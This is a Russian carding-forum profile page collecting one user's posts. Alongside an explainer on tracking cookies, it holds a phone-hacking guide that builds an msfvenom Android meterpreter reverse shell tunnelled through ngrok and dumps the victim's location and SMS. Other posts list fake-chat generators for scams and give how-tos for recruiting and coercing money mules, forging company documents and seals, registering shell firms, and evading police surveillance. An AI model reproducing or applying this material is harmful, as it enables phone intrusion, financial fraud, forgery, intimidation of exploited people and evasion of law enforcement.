Акция лета 2020: Оплачиваем написание статей на кардинг тематику. Подробности
Перейти к содержанию


VOR

Пользователи
  • Публикаций

    139
  • Зарегистрирован

  • Посещение

  • Победитель дней

    14

VOR стал победителем дня 22 нояб 2018

VOR имел наиболее популярный контент!

Информация о VOR

  • Звание
    Rank №4

Посетители профиля

1,113 просмотра профиля
  1. Если вы используете веб-браузер, то, вероятно, вы уже собрали несколько файлов "cookie". Файлы "cookie" используются для хранения информации о веб-сайтах: вашей регистрационной информации, того, что у вас есть в корзине, какой язык вы предпочитаете и т.д. Они создаются веб-сайтами и хранятся в вашем браузере до истечения срока их действия. Некоторые cookie-файлы безвредны, а некоторые остаются активными даже на сайтах, которым они не принадлежат, собирая информацию о вашем поведении. Они называются сторонними файлами "cookie" или, в более разговорной форме - отслеживающими файлами "cookie" . Отслеживающие файлы "cookie" могут быть настолько агрессивными, что многие антивирусные программы классифицируют их как шпионские программы. Несмотря на свою плохую репутацию, они стали настолько повсеместными, что их почти невозможно избежать. В этой статье мы разберем, как отслеживающие файлы "cookie" регистрируют вашу веб-активность. Виды cookies Во-первых, давайте кратко рассмотрим основные виды файлов "cookie": сеансовые ( temporary cookies ) и постоянные ( persistent cookies ). Постоянные cookies делятся на два типа: Основной файл cookie ( first-party ) – создается одним доменом веб-сайта. Посетитель запрашивает его, когда вводит URL в адресную строку браузера или выполняет переход по ссылке. Это куки, который создается одним доменом и не может использоваться другим. Могут храниться на компьютере в течение нескольких дней, месяцев или даже лет. Сторонний файл cookie ( third-party ) – это такой файл куки, который создается одним доменом при заходе пользователя на другой домен. Яркие примеры сторонних куки-файлов — это ретаргетинг и ремаркетинг, пиксели или скрипты отслеживания социальных сетей и так далее. Сеансовые cookies ( temporary cookies ) Самый основной тип файлов "cookie" - сеансовые ( временные ). Сеансовые куки существуют только в оперативной памяти и удаляются при закрытии браузера. Любой файл "cookie", созданный без даты истечения срока действия, автоматически является сеансовым. Простой пример использования временного файла "cookie" - запись в память данных о наполнении корзины в интернет-магазине. Основные постоянные cookies ( persistent cookies first-party ) Основные файлы "cookie" записываются на жесткий диск устройства и имеют срок годности. Они используются только тем веб-сайтом, который их создал, и могут хранится очень долго. Они остаются на вашем устройстве даже после закрытия веб-браузера. Одно из основных назначений постоянных файлов "cookie" создание удобств пользователю и экономия времени. Сторонние постоянные cookies ( persistent cookies third-party ) Сторонние файлы "cookie", также известные как отслеживающие, являются основной темой этой статьи. Они так же хранятся в памяти вашего устройства и имеют установленный срок годности. В отличие от основных файлов "cookie", сторонние "cookie" создаются на чужом сайте с помощью различных виджетов (т.е посещая такой сайт вы цепляете файл "cookie" сайта который посетили, и так же цепляете файл "cookie" который создан виджетами и принадлежит другому сайту). Это позволяет создателю cookie собирать и получать данные в любое время, когда пользователь посещает страницу с принадлежащим ему (создателю) ресурсом. Откуда берутся сторонние файлы "cookie"? Сегодня сайты редко состоят исключительно из кода и контента, зачастую они используют ресурсы других сайтов для создания и добавления функционала на свои веб-страницы. Эти ресурсы часто полезны и даже необходимы, но, к сожалению, эти же ресурсы часто являются крупнейшими виновниками онлайн-отслеживания. Несколько примеров ресурсов, через которые можно следить за пользователем: Рекламные объявления Виджеты социальных сетей ( кнопки «Нравится» и «Поделиться», разделы комментариев и т. д. ) Веб-аналитика Вам даже не нужно открывать рекламу или нажимать кнопку публикации в социальных сетях, чтобы информация о файлах "cookie" передалась обратно на сервер. Как только вы загрузите страницу, файл cookie автоматически отправляется на сервер, на котором он был создан. Если куки еще не существует, ресурс их создаст и после этого отправит на сервер. Вот некоторые компании, которые используют отслеживающие файлы "cookie": AddThis Adnxs Facebook Google Quantserve Scorecard Research Twitter Yieldmanager Admob Adsensecustomsearchads Adwords Doubleclick Googleadservices Googleapis Googlesyndication Googletagmanager Googletagservices Googletraveladservices Googleuserconten Google-analytics Gstatic Urchin Youtube Ytimg И многие, многие другие... Что сторонние файлы "cookie" знают обо мне? Отслеживающие файлы "cookie" обычно используются в рекламных целях, в частности , для ретаргетинга . Ретаргетинг - это тактика, которая часто основывается на отслеживании файлов cookie для показа рекламы людям, которые ранее посещали определенный сайт или проявили интерес к определенному продукту. Если вы когда-либо покупали или просто смотрели продукт на Amazon, а затем начали видеть объявления о похожих продуктах на других веб-сайтах - вы попали под ретаргетинг. На первый взгляд кажется, будто отслеживающие файлы "cookie" не так уж опасны, но эти файлы "cookie" могут начать собирать много информации о том, как вы просматриваете веб-страницы, какие страницы, как часто. Рекламные объявления Google есть везде, и, хотя это крупнейшая в мире рекламная компания, помимо неё существует множество других компаний. Из-за этого все рекламные компании могут собрать воедино историю того, какие веб-сайты вы посещаете, в какой последовательности и т.д. Когда куки отправляются обратно на их серверы, они часто содержат информацию о предыдущем сайте, который посетил пользователь, который называется URL-Referer . История просмотра это только начало. Отслеживающие файлы "cookie" могут записывать все виды информации: поисковые запросы, информацию о покупках, информацию об устройстве, местоположение, где вы бываете чаще, какие магазины\рестораны посещаете, когда и где вы видели предыдущую рекламу, сколько раз вы видели рекламу, по каким ссылкам вы нажимаете и т.д. Все это и многое другое собирается в фоновом режиме. Из чего состоит файл "cookie"? Файлы "cookie" состоят только из трех элементов: имени , значения и атрибутов. Имя ( .hulu.com | _ga ) используется веб-сайтами и рекламодателями для определения файлов "cookie" и того, для чего они используются. В компоненте значения ( Value ) хранится ваш уникальный рекламный идентификатор, чтобы создатель трекера мог идентифицировать вас при посещении других веб-сайтов. Обычно это выглядит как случайная строка цифр и цифр, но в некоторых случаях она не случайна и может содержать закодированную информацию, как изложено выше. Атрибуты включают характеристики cookie, такие как: Когда срок действия файла "cookie" истекает. Если дата истечения срока действия не установлена, cookie закрывается при закрытии браузера. У отслеживающих куки всегда есть сроки годности. Могут ли файлы "cookie" использоваться другими доменами. Может ли файл "cookie" быть отправлен через незащищенное соединение. Можно ли получить доступ к файлам "cookie" через JavaScript. Другие методы отслеживания Отслеживание через файлы "cookie" не новая технология. Они используются более десяти лет, и мало что изменилось в их механизмах работы. Несмотря на это, они предоставляют простой и точный способ отслеживать и записывать поведение пользователей в Интернете, и в ближайшее время они не исчезнут. Это не значит, что отслеживание файлов cookie - это единственный способ, с помощью которого третьи лица могут отслеживать, что вы делаете в Интернете. Помимо файлов "cookie" и отпечатка устройства есть: URL-Referer URL-Referer - это веб-адрес предыдущего веб-сайта, на котором вы щелкнули ссылку, чтобы перейти на текущий веб-сайт. Например, если вы нашли Opencard.us с помощью поиска Google и нажали на ссылку на эту статью в результатах поиска, URL-адрес для этой страницы будет принадлежать Google. URL-Referer могут использоваться по нескольким причинам, и одной из них является запись истории просмотров. Когда куки отправляются на сервер, который их создал, они часто содержат URL-адреса реферера. ( Собственно из-за URL-Referer и советуют заходить в шопы не из поисковой системы, а из соц.сетей, новостных сайтов, из ссылок в почте. ) Веб-маячок Веб-маяки или так называемые пиксели ( привет арбитраж ), представляют собой небольшие фрагменты кода на веб-страницах, которые проверяют, обращались ли вы к определенному контенту. Веб-маяк на самом деле является общим термином для нескольких аналогичных методов. Веб-маяки могут быть скрыты внутри элементов содержимого веб-страницы, что затрудняет их предотвращение. Они могут быть скрыты внутри изображений и других элементов страницы, чтобы регистрировать поведение пользователя и передавать эти данные обратно владельцу сайта. Веб-маяки обычно используются, чтобы проверить, действительно ли кто-то, получивший письмо, прочитал его. Встраивая пиксельный тег в электронное письмо - электронное письмо должно загружать ресурс от стороннего производителя. Когда это происходит, ресурс может запросить IP-адрес получателя, временную метку, тип браузера и то, установил ли владелец ресурса cookie в этом браузере. Как и файлы "cookie", сервер может хранить всю эту информацию и связывать ее с уникальным идентификатором отслеживания пользователя. Синхронизация файлов cookie Большинство отслеживающих файлов "cookie" могут использоваться только доменом, который их создал. Рекламные компании несут ответственность за многие домены, которые обслуживают сторонние файлы cookie, каждый из которых имеет свою собственную базу данных профилей пользователей и сегментов аудитории, используемых для таргетинга. Если не считать Google, большинство этих рекламных компаний недостаточно активны, чтобы охватить большие части сети, что приводит к пробелам в их данных. Поэтому появилась синхронизация файлов "cookie" - практика объединения рекламных наборов данных для создания более точных и полных профилей пользователей,естественно для последующего отслеживания. Синхронизация файлов "cookie" происходит, когда две рекламные компании объединяются или приобретают базы друг у друга. Эта консолидация помогает им конкурировать с Google, но также оказывает негативное влияние на конфиденциальность пользователей. Same Site и Google 80 Что такое SameSite и как он работает? Весной 2019 года разработчики Chrome объявили о внедрении новой модели безопасности для обработки файлов "cookie". Теперь у каждого пользователя по умолчанию будет активирован флаг «same-site-by-default-cookies». При этом, если в файле не будет атрибута SameSite, браузер все равно самостоятельно поставит значение «SameSite=Lax» —это ограничит отправку сookie для вставок со сторонних сайтов ( т.е ограничит возможности работы отслеживающих "cookie" файлов ). Однако владельцы сайтов смогут снимать это ограничение, прописывая в настройках сookie параметр «SameSite=None, Secure» — последний параметр означает, что такой запрос вдобавок должен приходить на сервер только по защищённому каналу. Изначально, по стандарту HTTP, браузер отправлял cookies при любом запросе на соответствующий им домен. Однако такие механизмы открывали возможности для проведения CSRF-атак — мошенники могли при определенном стечении обстоятельств получить доступ к разным ресурсам, пользуясь файлами "сookie". Поэтому в 2019 году появился атрибут SameSite, позволяющий контролировать, как браузер будет отправлять cookies в случае, если страница сайта посылает запрос на другой домен. При этом первоначально, когда Chrome только начали разрабатывать SameSite, атрибуту нужно было присвоить явное значение Strict или Lax (позже мы их рассмотрим подробнее). Отсутствие SameSite было эквивалентно «SameSite=None», то есть по умолчанию cookies всё так же передавались при любых запросах. Основной целью изменения работы атрибута SameSite является повышение прозрачности и безопасности для пользователей — люди смогут узнавать, кто отслеживает и использует информацию из сookie, которой они делятся. Кроме того, изменение в SameSite повлияет как на поведение пользователей, так и на рекламодателей, медиа и любых компаний, которые используют файлы сookie для анализа поведения своей аудитории. В 2016 году инженеры из Chrome представили концепцию атрибута SameSite, с помощью которого разработчики сайтов смогут устанавливать правила для совместного использования и доступа к файлам SameSite. Значение атрибута может устанавливаться в трех диапазонах — Strict, Lax или None. — Strict — самое строгое значение атрибута. К файлам "cookie" с таким параметром можно получить доступ только при посещении домена, с которого он был изначально установлен. Другими словами, «SameSite= Strict» полностью блокирует передачу cookie с a.com, когда страница сайта b.com отправляет запрос. При этом передача "cookie" не произойдет даже в том случае, если пользователь щелкнет ссылку верхнего уровня в стороннем домене. Такой вариант лучше всего подходит для сервисов, требующих высокой безопасности, например, для банковского сектора. — Lax — это значение позволяет всем типам сайта, которые принадлежат к одному и тому же домену, получить доступ к cookie. В отличие от None, где "cookie" отправляются всегда по умолчанию, это значение, как и Strict, отправляется только по запросу определенного сайта. Однако Lax разрешает доступ к навигации верхнего уровня с помощью безопасного метода HTTP, такого как HTTP GET. Файл "cookie" не будет отправляться с POST-запросами между доменами или при загрузке сайта во фрейме с несколькими источниками, но он будет отправляться при переходе на сайт по стандартной <a href=...> ссылке верхнего уровня. — None — это значение позволяет отслеживать пользователей на разных сайтах. Файлы "cookie" с этим параметром будут работать так же, как они работают сегодня. При этом для установки этого значения атрибута необходимо не просто указать None, но и выбрать тип — Secure, который гарантирует, что запрос передается по безопасному соединению. В случае, если пользователь не станет указывать Secure, то запрос будет отклонен браузером. Обновление Chrome 80 SameSite С обновлением Chrome версии 51 Google предоставила разработчикам сайтов возможность устанавливать правила совместного использования файлов "cookie". При этом многие разработчики не следуют этой рекомендуемой практике, поэтому в очередном обновлении — Chrome 80, разработчики Google насильно изменили значение SameSite на Lax по умолчанию. Другими словами, Chrome решил по умолчанию ограничить использование всех файлов "cookie" и требует, чтобы разработчики самостоятельно помечали файлы "cookie" значением «SameSite=None» в том случае, если им это необходимо, и, естественно, брали на себя ответственность за это. Что будут делать остальные браузеры? Firefox, Edge и другие браузеры также изменят работу с файлами "cookie" по умолчанию следующим образом: — Cookie без SameSite-атрибута будут обрабатываться как «SameSite=Lax». Если вам нужен сторонний доступ, то необходимо обновить "cookie". — Файлы "cookie", для которых требуется доступ третьих сторон, должны иметь атрибут «SameSite=None; Secure», чтобы разрешить доступ к ним. Примечание Как мы видим после введения SameSite - чуда не произойдёт, отслеживать не перестанут, но "усилят" защиту от веб-атак. В плане конфиденциальности: создалась видимость изменения политики обработки "cookie", но по факту корпорации типа Google просто добавили геморроя разработчикам сайтов и при этом ещё и переложили всю ответственность на них же, иными словами очередной - "Do Not Track", на который снова будут класть большой болт 90% сайтов. Что это значит для нас? Изменится ли что-нибудь? Если вы не хакер - Нет. Единственное - со старым печеньем могут возникнуть проблемы. Спасибо за внимание. Всем удачи и профита!
  2. Лейте траффик на хорошие офферы, самые прибильные: казино/букерсы
  3. Простые и интуитивно понятные сервисы для создания фейковых переписок. Предупрежден - значит, вооружен. Могут всплывать в блеках на форумах, рипаки не дремлют. ScreenChat- обычные смс Fake WhatsApp Chat Generator- WhatsApp ‎WhatsFalse IOS- аналогично, приложение для IOS WhatsPrank Android- аналогично, приложение для Android Fake Telegram Chat Generator- переписка в ТГ для IOS и Android (на выбор), также в разделе Social Media можно выбрать FB, Instagram, Twitter и тому подобное. Zeoob - создание фейковых постов для FB, WhatsApp, Snapchat, Instagram, Twitter и так далее. Также для инстаграмма программа iOS ‎Social Prank Direct Messages - фейк переписка директа.
  4. Простенькая статья для новичков для улучшения понимания процесса получения контроля над удаленный девайсом. Речь пойдёт от ngrok и metasploit, и как можно взломать телефон и захватить управление Сначала зайдите на сайт Ngrok и создайте там аккаунт. После этого скачиваем сам ngrok. Затем выкидываем его на рабочий стол и пишем: ngrok-stable-linux-amd64.zip И пишем ./ngrok authtoken <TOKEN> Прописываем в терминале ./ngrok tcp 4444 Кстати, если у вас белый IP адрес, то Ngrok'ом можно не пользоваться. Теперь нам надо уже пойти к создания нашего пейлоада для телефона. Для этого нам поможет msfvenom, для этого мы в новой консоле пишем: msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=10612 R > payload.apk Если ты не используешь Ngrok, то в поле LHOST вписываешь свой ip адрес, а в поле LPORT ставишь 4444 Вот сам пейлоад готов, теперь мы должны кинуть его жертве. Теперь нам надо узнать ип, если вы на кали то командой "ipconfig", а если как и я на арч то "ip a". Ну а дальше в бой пойдет сам метасплоит, он предустановлен в kali linux). Чтобы его запустить надо просто написать в консоле msfconsole. И уже там пишем: msfconsole use exploit/multi/handler set PAYLOAD android/meterpreter/reverse_tcp set LHOST localhost set LPORT 4444 exploit После чего жертва запустит наш пайлоад, и у нас откроется сессия. Теперь у нас есть доступ к телефону жертвы. Давайте узнаем текущую геолокацию: geolocate Также можно сделать дамп всех смс, командой: sms_dump Данными действиями мы произвели подключение к телефону, и у нас есть полный набор возможностей дальнейших действий с ним.
  5. binance.com Там обязательный вериф от какого-то объема Небольшие суммы можешь анонимно там гонять
  6. Айпишники ТОРа никак не пройдут анти-фрод системы, идея утопичная. Лучше соксы юзай
  7. За всеми стоят массоны )) А если серьезно предположим, что чипы будут внедрены, то конечно преступности ПО ИДЕЕ станет меньше.
  8. Тёмная сторона интернета – та сфера, в которой крутится огромное количество денежных средств и людей, работающих с ними. Однако без необходимых знаний и подготовки очень легко можно оказаться не тем, кто зарабатывает, а тем, на ком делают деньги – именно поэтому крайне важно изучать всю доступную информацию о подобной деятельности. Как вы уже, скорее всего знаете, большинство схем построено на обмане людей в той или иной форме. Мошенничество с банковскими картами, сливы данных, вбив вещей – всё это с каждым годом только процветает. Однако, как и во многих других областях, в «серой» зоне махинаций существует прослойка людей, чей труд на первый взгляд кажется не особо важным. Но без и- участия огромное количество схем не могло бы существовать, и, естественно, эти люди получают весьма весомые куски от финансового «пирога». Имя им – дропы и дроповоды. Дроп – это человек, который был подготовлен либо прямо, либо косвенно для выполнения ряда каких-либо действий или для получения ресурсов. Кроме того, всё, что от них иногда требуется – это информация, так или иначе используемая остальными людьми. Нужно ли принять посылку с каржеными вещами, обналичить деньги, взять в банке кредит или зарегистрировать фиктивную организцию – всё это работа для дропов, иногда не имеющих понятия, что и зачем они на самом деле делают. Однако между ними и непосредственными работодателями, к примеру, кардерами, существует ещё одна группа людей – дроповоды. Дроповоды - своего рода мозговые центры всей этой системы. Не подставляя себя напрямую под какие-либо риски, именно они получают заказы. После чего выбирают из своей тщательно организованной базы личностей исполнителей, передают им требования и ждут результата, после чего получают оплату и делятся ей со своими работниками. Таким образом, их деятельность заключается лишь в сборе тех, кто сможет в нужной точке мира совершить по необходимости ряд действий, и в том, чтобы гарантировать их исполнение тем или иным способом. Заказчики никогда не обращаются напрямую к «пешкам» - ведь если те окажутся ненадежными, лучше переложить груз ответственности на кого-то другого. Именно деятельность дроповодов мы и будем рассматривать, ведь простота их работу иллюзорна. Как и в любой подобной области, здесь имеется множество подводных камней, хитростей и тонкостей, позволяющих достичь максимальной эффективности и заработка – а ведь к этому стремимся мы все. Единственное, о чем стоит ещё упомянуть – помните, что все действия вы совершаете исключительно на свой страх и риск. Именно поэтому необходимо подходить к этой теме максимально продуманно, обеспечив себе достаточную степень безопасности и возможность в случае чего сделать вид, что вы вообще ни при чем – ведь в том случае, если к вам возникнут какие-то вопросы у органов, остаётся надеяться лишь на собственную подготовленность.
  9. Никому не хочется быть рано или поздно пойманным доблестными людьми в форме. Ещё больше не хочется, чтобы у них на руках была папка с кучей подтверждений нарушений закона, аккуратно сшитых и ужасающих неизбежным наказанием. Не самая приятная картина, согласитесь? Именно по этой причине и хотелось бы рассказать о том, каким образом можно уберечь себя от попадания неподходящей информации в руки следствия. Ниже будут рассмотрены прежде всего технические аспекты безопасности, хотя ими не стоит ограничиваться – помните, что даже запомнившие ваше лицо бабушки на улице могут стать первым шагом к грандиозному провалу. Итак, начнем с вашего главного «врага», способного слить как ваши контакты, так и местоположение, а также связь между самыми защищенными каналами коммуникации. Устройство, которое постоянно с собой, которое постоянно сообщается со внешним миром – телефон. И если вы считаете, что такой подход – паранойя, то задумайтесь вот о чём. У каждой вышки ОпСОСа есть радиус действия, внутри которого все устройства отсылают информацию о своих сим-картах – для того, чтобы связь постоянно была на высоком уровне. В результате если спецслужбы захотят узнать о том, в каком месте находился какой-либо абонент, они запрашивают логи с этих самых вышек. Одна вышка способна дать лишь весьма обширную зону поисков, но тут в дело вступают окружающие антенны, так же ловящие сигнал мобильного, пусть и слабее. В результате на пересечении этих областей образуется маленький участок территории, на котором этот самый абонент и находился в нужный промежуток времени. Составить несколько таких точек с промежутком в десять минут и пожалуйста – уже готов маршрут передвижения. Естественно, подобные операции предпринимаются только в случае поимки действительно опасных преступников, но лишняя предосторожность никогда не помешает. Поэтому рабочие и личные контакты пересекаются с той же частотой, что «чистая» и «рабочая» симки в вашем телефоне – то есть никогда. Модемы лучше тоже периодически менять. Ещё один серьезный враз анонимности – банкоматы. Все они оборудованы камерами, это неоспоримый факт. Поэтому если вам будет необходимо обналичить не совсем чистые деньги, то, во-первых, лучше пользуйтесь чужой дебеткой, а во-вторых – перед снятием маскируйтесь и старайтесь минимально попадать в поле зрения объектива. Но Большой Брат следит не только из банкоматов – существует ещё и система дорожных камер, которая, кроме выписывания штрафов, занимается ещё одной весьма неприятной вещью – регистрирует в базе данных номера всех проезжающих машин. Таким образом можно отследить, куда двигалось то или иное транспортное средство в определенные моменты времени. Поэтому если вы хотите уехать из города незаметно, то автобусы будут лучшим вариантом. Можно попытаться договориться с проводниками поезда, чтобы вас взяли в обход системы регистрации – иногда это срабатывает. Но, главное, помните одну простую мораль – долго и спокойно живёт лишь тот, кто всегда помнит и осознает, куда и в какие моменты времени поступает информация о нём.
  10. Современный мир все больше и больше доносит до широких слоев населения опасности быть обманутыми в интернете или втянутыми в какие-то подозрительные схемы. По итогу, круг «доверенных лиц» весьма сузился – осталось лишь государство, друзья да солидные организации. А теперь представьте, что вам нужно сделать из такого вот человека своего разводного дропа. Как сделать так, чтобы он вам поверил и сдался с потрохами? Ведь вы не являетесь частью правящей структуры, убедить его в том, что вы старые друзья, тоже вряд ли выйдет… А вот прикинуться организацией – почему бы и нет. Собственно, сегодня мы рассмотрим то, каким образом можно сделать из себя представителя вполне серьезной крупной фирмы – вполне возможно, даже реальной. Первое, что нам понадобится – выбрать компанию-донора. Лучше брать организации среднего звена – не фирмы-одноневки, но и не торговых гигантов. После того, как определились с целью, идём на http://egrul.nalog.ru/ и вводим название либо ИНН. Осталось пройти капчу, и вуаля – у нас на руках электронная выписка из ЕГРЮЛ с пачкой интересных данных вроде ОГРН, КПП и прочего. Нам оттуда понадобится прежде всего «…ФИО лица, имеющего право без доверенности действовать от имени юридического лица». Записываем. Далее – узнаем, с каких цифр начинается ИНН вашего города. Делается это буквально двумя минутами в гугле. Там же ищем устав ООО соответствующего города, свидетельство о постановке на учёт, и, на всякий случай – вид выписки ЕГЮРЛ. Теперь находим сервис по отрисовке документов, устраивающий по условиям, и делаем заказ. Что нам необходимо – заменить в документах всю информацию, включая ИНН, на «наше» предприятие. Кроме того, потребуется новый скан паспорта – с ФИО, записанными чуть ранее. Всю эту кипу документов печатаем на ч\б принтере, и каждый лист подписываем сакральной фразой: «Копия верна. Ген. директор ФИО подпись». На очереди – конторы, изготавливающие печати. Даём им ИНН, ОГРН, КПП и название ООО, ждём изготовления и пропечатываем все копии. С этого момента в глазах окружающих – вы полноценный представитель серьезной компании, более того – генеральный директор, способный самостоятельно распоряжаться любыми делами. Однако открою один маленький секрет: вся эта схема может пригодиться не только для вербовки дропов и для внешней видимости. Вы можете на правах юрлица прозванивать, к примеру, строительные компании, рассказывая им, что собираетесь с ними сотрудничать длительное время и хотели бы получить скидку как юридическое лицо. У вас могут попросить расчетный счет – тогда проявляем чудеса СИ и сами звоним в компанию, от имени которой выступаем, и разыгрываем клиента, готового приобрести продукцию. Как видите, обладая некой креативностью и смелостью можно на ровном месте получить не только дропов, но и в целом облегчение жизни – а ведь это только начало.
  11. Никому не хочется быть слитым при появлении первых же вопросов к дропу, не правда ли? Именно поэтому, как и во многих других теневых сферах, одна из вещей, которым необходимо уделять максимум внимания - это собственная защита. Ещё один важный момент – то, что методы организации безопасности в случае работы с постоянными дропами и с постоянно меняющимся составом кадров разные, и требуют, соответственно, других действий. Сегодня мы остановимся на том варианте, когда вы постоянно находитесь в поиске «пешек», встречаясь с новыми людьми, не имеющими никакого кредита доверия. Итак, здесь ключевое правило следующее: делай всё, чтобы тебя нельзя было идентифицировать. Да, вам часто придётся встречаться и договариваться с дропами лично, и ваше лицо они запомнят. Но необходимо добиться того, чтобы органы правопорядка, в случае, если выйдут на кого-то из ваших, не смогли получить достаточное количество информации для нахождения «того человека, который нами управлял». Дьявол, как обычно, кроется в деталях. Сравните, какое из двух описаний поможет найти кого-либо конкретного: «среднего роста, в красной кофте KFC, с очками, золотыми часами на левой руке и шрамом на щеке, потом уехал на машине такой-то марки-модели» или «среднего роста, в черной осенней куртке и джинсах, нет, часов и очков не было, шрамов тоже, ушёл пешком»? Вот то-то же. Вам необходимо стать максимально «обыкновенным», убрать всё, что делает вас конкретной личностью. Ещё одна весьма очевидная вещь, которую вам придётся поменять – имя и фамилия, которыми вы представляетесь. Желательно, чтобы у вас были отрисованные документы на эти данные, хотя и не обязательно. Посреднику лучше тоже знать минимум информации – когда никто из этой «цепочки» не может сказать ничего внятного про остальных, полиции проще сделать дело «висяком» или же поверить в складно рассказанную историю о «потерянной» карте. Да, лучше, если легенда будет продумана заранее и в деталях. Как объяснить дропу, зачем ему история, которую в случае чего нужно будет рассказывать дядечкам в погонах – отдельная тема. Объяснить можно. И лучше, если он до последнего будет её держаться – по итогу так будет проще всем – и ему, которого отпустят спустя небольшое время без дополнительных вопросов, и посреднику, который встал бы под удар следующим, и вам – скорее всего, не рискующим ничем, кроме возможной потери ряда работников. И последнее на сегодня, но близкое к первому по значимости – делайте так, чтобы ваш личный номер НИКОГДА не светился в связи с дропами, желательно, не светился с вашим по одним координатам и, самое критичное – никогда не вставляйте рабочие сим-карты в одно устройство с личными. Это автоматически их связывает в базах данных как принадлежащие одному человеку – думаете, вам это нужно?
  12. Заказы в теневой сфере интернета бывают самыми разнообразными, поскольку каждый пытается делать что-то своё, что-то оригинальное – и для всего этого могут понадобиться самые неожиданные вещи. Одна из них – подставная ООО, зарегистрированная на ручного дропа, который будет готов в случае чего оказывать ещё и дополнительные услуги. Так как все же открыть фирму на дропа так, чтобы на это не ушло огромное количество времени, денег и обязательно закончилось успехом? Как не застрять во всей бюрократии и документах? Ответ: если вы не бухгалтер по образованию и никогда не имели подобного опыт – никак. Современная государственная система устроена так, что даже делая все максимально чисто, для белых целей, вы можете потратить невообразимые объемы времени на постоянный досбор и переделку различной документации, оформление счетов и прочая, и прочая. Однако выход есть – в любой точке СНГ можно найти конторы, которые зарабатывают как раз на облегчении всей это бумажной волокиты. Достаточно просто поискать «оказание юридических услуг в ‘название города’», выбрать на свой вкус и прийти туда с дропом. Обычно на сообщение о том, что вы пришли открывать свою фирму в подобных местах реагируют весьма тепло – им не сильно много работы, поскольку схемы уже давно и прочно налажены, и вполне приятные деньги. Приходите, сажаете дропа и начинаете прямо за него говорить, мол, необходимо открыть ООО, но гендиректор – вот этот человек. Скорее всего, вопросов к вам никаких не возникнет – подобные операции весьма распространены. Вам выдадут анкету и начнут задавать ряд стандартных, скриптованых вопросов: с чем собираетесь работать, сколько соучредителей, какое количество денег закладывается в уставной капитал и все в том же духе. Кроме того, в какой-то момент вам предложат создать расчетный счет. Любое предприятие должно его иметь, однако делать его вручную – очень муторное дело, в особенности на дропа. Различные же «юрпомощи» обычно имею своего давно прикормленного человека в банке, способного провести документы по упрощённой схеме – а это именно то, что вам нужно. Так что соглашайтесь. Если у вас имеются какие-то вопросы касательно организации фирмы или же необходимы дополнительные услуги – говорите, поскольку для конторы это дополнительный заработок, и ради денег они готовы пойти действительно на многое. После этого все, что вам осталось – оплатить услуги и госпошлину, в сумме в среднем это около 8-10 тысяч российских рублей. И, пожалуйста, проверьте, чтобы был заключен договор – в случае мошенничества вам будет несколько проблематично подать заявление в полицию.
  13. Итак, вы начали свою карьеру дроповода, вам поступил весьма интересный заказ – к примеру, обналичить с пластика какую-то круглую сумму. Вы радостно выбираете дропа, который ни сном ни духом о том, откуда на самом деле деньги, и даёте его контакты своему клиенту. Карта отправлена, деньги с неё сняты и… Всё – ваша «пешка» пропадает со связи. Мало того, что СС-ка ушла вникуда, вы ещё и остались должны, и если вы не компенсируете этот провал – ваша репутация значительно пострадает. В чём заключается ваша ошибка? А в том, что у вас всегда должны быть либо какие-то рычаги давления на своего посыльного, либо гарантии. Со вторым сложнее – в эту категорию попадают частные случаи, каких=то общих правил здесь нет. А вот манипуляция – та сфера деятельности, где вам нужно прочно обосноваться. Хорошо, если ваши работники вас боятся или уважают, но идеально – если оба эти компонента смешаны друг с другом. Одним из основных способов пассивного давления, которые не допускают даже мысли о том, чтобы вас кинуть, является наличие информации. Если вы знаете, где найти своего работника в реальной жизни, его адреса, телефоны и знакомых – в случае какой-то проблемы вы сможете до него добраться. Такие дропы называются «выцепляемыми». Единственный способ вас кинуть для них, избежав последующего прессинга – сменить место жительства, телефон и круг общения. Согласитесь, это не стоит того, чтобы получить какую-то небольшую прибыль? «Невыцепляемые» же дропы это те, чьими данными вы не владеете, и в случае чего не сможете наладить с ними контакт. Это не всегда плохо – к примеру, если вы оформляете кредит на купленные сканы документов, их владелец фактически тоже попадает под эту категорию. Но вам никогда не понадобится добираться до него, не правда ли? Вообще, необходимо упомянуть, что для каждого вашего работника будет необходим особый подход. Здесь необходимо владеть СИ – социальной инженерией, искусством убеждать. Где-то вам придётся изображать из себя честного и открытого человека – так, чтобы вас не было желания кинуть из-за «родственности душ». Где-то, наоборот, нужно чётко дать понять, что в случае подставы в дверь кидалы позвонят – и это будут точно не органы правопорядка. Случаются дропы, которые согласны лишь на выполнение какого-то одного дела без последующего сотрудничества и сопровождения. Это не значит, что из них выйдут плохие коллеги – скорее, наоборот. Чаще всего это люди, просто заботящиеся о своей безопасности – в случае, если у полиции возникнут к ним какие-то вопросы, они смогут сказать, что к ним просто подошли на улице и предложили подзаработать. Таким образом они и себя выведут из-под удара, и вас не сдадут – все в плюсе. Главное, помните – дроп для вас не друг, не товарищ и не родственник. Это своего рода материал, расходник – в случае чего вам придётся бросить. Он не должен знать что-то больше того, что необходимо ему для работы – каждый раз, когда хотите что-то сказать, подумайте, может ли он без этого обойтись. Если ответ отрицательный – подумайте ещё раз. Чем меньше следов ведёт к вам, тем лучше – потому что в этой профессии никому нельзя доверять.
  14. Как вы уже могли заметить, дропы – это не та тема, которая ограничивается узким кругом схем, в которых они могут применяться. Количество сфер, из которых можно получить профит, порой поражает воображение, и именно поэтому крайне важно изучить их все и найти свою собственную нишу. Дальше – постепенно развиваться в ней, нарабатывать себе базу, репутацию и связи – чем их больше, тем стабильнее и комфортнее вы будете жить в дальнейшем. Итак, в целом можно разделить то, где могут пригодиться дропы, на три раздела: финансовый, юридический и вещевой. Все вполне просто и очевидно: в финансовых схемах через дропа так или иначе проходят денежные средства, в юридических используются законные возможности и лазейки, и в вещевых, собственно, происходит прямая работа с физическим товаром. На самом деле, большинство ситуаций, с которыми вам придётся столкнуться, будут объединять две, а иногда и все три раздела – все зависит от креативности. Давайте же приступим к рассмотрению основных видов работы: Регистрация и выпуск банковских карт. Один из лидеров по популярности и известности, данный способ требует от дропа зарегистрировать в банке на своё имя СС-ку для дальнейшего её использования – обычно для получения и последующего вывода «серых» денег. Стоимость такой услуги варьируется в зависимости от уровня пластика – моментальные карты в среднем стоят около трёх тысяч российских рублей, классика – четыре-пять, голд – шесть восемь, и, наконец, цена платины порой достигает 12 тысяч. Ещё один вариант – оформление подставного ООО и там – зарплатных проектов, но это отдельная тема. Идентификация электронных платёжных кошельков. Тема, работающая с момента появления сертификатов как вида. В зависимости от уровня аттестат платёжные системы накладывают те или иные лимиты, и задача дропа – на свои или отрисованные документы получить как можно более высокий уровень 